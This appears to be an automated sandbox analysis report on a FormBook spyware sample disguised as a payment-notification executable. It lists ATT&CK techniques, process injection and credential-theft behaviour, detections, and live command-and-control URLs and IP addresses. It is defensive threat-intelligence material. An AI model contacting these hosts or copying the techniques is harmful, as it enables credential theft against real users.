                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials12
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589911 Sample: Payment Notification Confir... Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 28 www.tabyscooterrentals.xyz 2->28 30 www.sesanu.xyz 2->30 32 20 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 8 other signatures 2->50 10 Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 vtTdsKSTqQr.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 w32tm.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 vtTdsKSTqQr.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.esscosaathi.info 15.197.240.20, 49868, 49884, 49896 TANDEMUS United States 22->34 36 www.sesanu.xyz 199.192.21.169, 50021, 50022, 50023 NAMECHEAP-NETUS United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe76%ReversingLabsWin32.Trojan.AutoitInject
                Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe36%VirustotalBrowse
                Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe100%AviraDR/AutoIt.Gen8
                Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.u75lmwdgp0du.homes/8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J0%Avira URL Cloudsafe
                https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla0%Avira URL Cloudsafe
                http://www.myfastuploader.sbs/y3ui/0%Avira URL Cloudsafe
                http://www.811371bb10.buzz/ucix/100%Avira URL Cloudmalware
                http://www.grimbo.boats/mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w=0%Avira URL Cloudsafe
                http://www.tabyscooterrentals.xyz/l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J0%Avira URL Cloudsafe
                http://www.ogbos88.cyou/q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J0%Avira URL Cloudsafe
                http://www.sesanu.xyz/rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J0%Avira URL Cloudsafe
                http://www.sesanu.xyz/rf25/0%Avira URL Cloudsafe
                https://ogbos88vip.click0%Avira URL Cloudsafe
                http://www.ogbos88.cyou/q1v9/0%Avira URL Cloudsafe
                http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J100%Avira URL Cloudmalware
                http://www.esscosaathi.info/u8xw/0%Avira URL Cloudsafe
                http://www.u75lmwdgp0du.homes0%Avira URL Cloudsafe
                http://www.sovz.pro/vwha/0%Avira URL Cloudsafe
                http://www.u75lmwdgp0du.homes/8m3y/0%Avira URL Cloudsafe
                http://www.sql.dance/gott/0%Avira URL Cloudsafe
                http://www.esscosaathi.info/u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E=0%Avira URL Cloudsafe
                http://www.rtp189z.lat/csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI=0%Avira URL Cloudsafe
                http://www.tabyscooterrentals.xyz/l5cx/0%Avira URL Cloudsafe
                http://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J0%Avira URL Cloudsafe
                http://www.sovz.pro/vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U=0%Avira URL Cloudsafe
                http://www.grimbo.boats/mjs1/0%Avira URL Cloudsafe
                http://www.rtp189z.lat/csd1/0%Avira URL Cloudsafe
                http://www.sql.dance/gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias=0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                rtp189z.lat
                68.65.122.71
                truetrue
                  unknown
                  www.sovz.pro
                  45.130.41.107
                  truetrue
                    unknown
                    www.sql.dance
                    199.59.243.228
                    truetrue
                      unknown
                      www.sesanu.xyz
                      199.192.21.169
                      truetrue
                        unknown
                        www.zucchini.pro
                        199.59.243.228
                        truetrue
                          unknown
                          tc142-site01.mac-cdn.net
                          103.174.136.137
                          truetrue
                            unknown
                            www.esscosaathi.info
                            15.197.240.20
                            truetrue
                              unknown
                              www.grimbo.boats
                              104.21.18.171
                              truefalse
                                high
                                myfastuploader.sbs
                                136.243.225.5
                                truetrue
                                  unknown
                                  www.ogbos88.cyou
                                  104.21.13.141
                                  truetrue
                                    unknown
                                    natroredirect.natrocdn.com
                                    85.159.66.93
                                    truefalse
                                      high
                                      ns91.l4y.cn
                                      38.22.89.164
                                      truetrue
                                        unknown
                                        www.myfastuploader.sbs
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.glyttera.shop
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.tabyscooterrentals.xyz
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.usps-infora.top
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.u75lmwdgp0du.homes
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.rtp189z.lat
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.yacolca.digital
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.811371bb10.buzz
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.biocaracol.online
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.sesanu.xyz/rf25/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sesanu.xyz/rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.myfastuploader.sbs/y3ui/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.u75lmwdgp0du.homes/8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.ogbos88.cyou/q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.grimbo.boats/mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.811371bb10.buzz/ucix/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.tabyscooterrentals.xyz/l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.esscosaathi.info/u8xw/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.ogbos88.cyou/q1v9/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.rtp189z.lat/csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sovz.pro/vwha/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.esscosaathi.info/u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.u75lmwdgp0du.homes/8m3y/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.tabyscooterrentals.xyz/l5cx/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sql.dance/gott/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3Jtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sovz.pro/vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.grimbo.boats/mjs1/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.rtp189z.lat/csd1/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sql.dance/gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabw32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Klaw32tm.exe, 00000003.00000002.4153951411.0000000004ACE000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000356E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ogbos88vip.clickw32tm.exe, 00000003.00000002.4153951411.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000324A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.ecosia.org/newtab/w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.comw32tm.exe, 00000003.00000002.4153951411.00000000052A8000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000003.00000002.4155777981.0000000006790000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000004486000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000002F26000.00000004.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003D48000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.00000000407D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.u75lmwdgp0du.homesvtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchw32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            136.243.225.5
                                                                            myfastuploader.sbsGermany
                                                                            24940HETZNER-ASDEtrue
                                                                            104.21.18.171
                                                                            www.grimbo.boatsUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            199.192.21.169
                                                                            www.sesanu.xyzUnited States
                                                                            22612NAMECHEAP-NETUStrue
                                                                            15.197.240.20
                                                                            www.esscosaathi.infoUnited States
                                                                            7430TANDEMUStrue
                                                                            104.21.13.141
                                                                            www.ogbos88.cyouUnited States
                                                                            13335CLOUDFLARENETUStrue
                                                                            199.59.243.228
                                                                            www.sql.danceUnited States
                                                                            395082BODIS-NJUStrue
                                                                            38.22.89.164
                                                                            ns91.l4y.cnUnited States
                                                                            21624CYBERLYNK-PHXUStrue
                                                                            45.130.41.107
                                                                            www.sovz.proRussian Federation
                                                                            198610BEGET-ASRUtrue
                                                                            85.159.66.93
                                                                            natroredirect.natrocdn.comTurkey
                                                                            34619CIZGITRfalse
                                                                            103.174.136.137
                                                                            tc142-site01.mac-cdn.netunknown
                                                                            7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                            68.65.122.71
                                                                            rtp189z.latUnited States
                                                                            22612NAMECHEAP-NETUStrue
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1589911
                                                                            Start date and time:2025-01-13 10:17:59 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 35s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 44
                                                                            • Number of non-executed functions: 301
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target vtTdsKSTqQr.exe, PID 4948 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            TimeTypeDescription
                                                                            04:19:47API Interceptor10992260x Sleep call for process: w32tm.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            136.243.225.54p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                                            • www.myfastuploader.sbs/wzdf/
                                                                            SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.myfastuploader.sbs/wzdf/
                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • www.myfastuploader.sbs/y3ui/
                                                                            104.21.18.171smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                            • www.grimbo.boats/ej4l/
                                                                            PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                            • www.grimbo.boats/kxtt/
                                                                            Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                            • www.grimbo.boats/kxtt/
                                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                            • www.grimbo.boats/kxtt/
                                                                            SecuriteInfo.com.Variant.Tedy.130342.18814.exeGet hashmaliciousFormBookBrowse
                                                                            • www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
                                                                            199.192.21.169CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lonfor.website/bowc/
                                                                            plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                            • www.astrafusion.xyz/pcck/
                                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bokus.site/qps0/
                                                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                            • www.bokus.site/qps0/
                                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bokus.site/qps0/
                                                                            ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.solidf.xyz/stho/
                                                                            DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lonfor.website/stiu/
                                                                            PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lonfor.website/bowc/
                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sesanu.xyz/rf25/
                                                                            Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lonfor.website/bowc/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.grimbo.boatsCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.182.198
                                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.182.198
                                                                            FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.18.171
                                                                            smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.18.171
                                                                            PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.18.171
                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.182.198
                                                                            Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.18.171
                                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.18.171
                                                                            inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.182.198
                                                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.182.198
                                                                            www.sql.danceJ1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.228
                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.228
                                                                            bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                            • 199.59.243.227
                                                                            tc142-site01.mac-cdn.netrHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 103.174.136.137
                                                                            www.esscosaathi.inforHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 15.197.240.20
                                                                            www.sovz.prorHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.130.41.107
                                                                            www.sesanu.xyzrHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.192.21.169
                                                                            www.zucchini.prorHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.228
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            trow.exeGet hashmaliciousUnknownBrowse
                                                                            • 144.76.24.9
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                            • 138.201.222.163
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 88.198.246.242
                                                                            CLOUDFLARENETUSQUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 104.21.80.1
                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.64.1
                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.32.1
                                                                            invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.74.152
                                                                            g6.elfGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            http://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpgGet hashmaliciousUnknownBrowse
                                                                            • 104.21.96.1
                                                                            CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                            • 188.114.96.3
                                                                            g3.elfGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            1001-13.exeGet hashmaliciousFormBookBrowse
                                                                            • 188.114.96.3
                                                                            TANDEMUShttp://ledger-recovery.co.uk/Get hashmaliciousUnknownBrowse
                                                                            • 15.197.193.217
                                                                            https://ledger-recovery.co.uk/publicGet hashmaliciousUnknownBrowse
